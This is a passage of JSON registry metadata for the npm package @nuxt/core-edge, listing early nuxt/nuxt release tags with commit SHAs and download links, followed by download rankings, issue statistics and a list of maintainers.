:null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T20:21:25.162Z","dependent_packages_count":6,"downloads":24263,"downloads_period":"last-month","dependent_repos_count":424,"rankings":{"downloads":1.0586659923449155,"dependent_repos_count":0.8459715122247295,"dependent_packages_count":3.081991358317102,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.6186636805636194,"average":1.2195225536407446},"purl":"pkg:npm/%40nuxt/core-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/core-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/core-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/core-edge/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,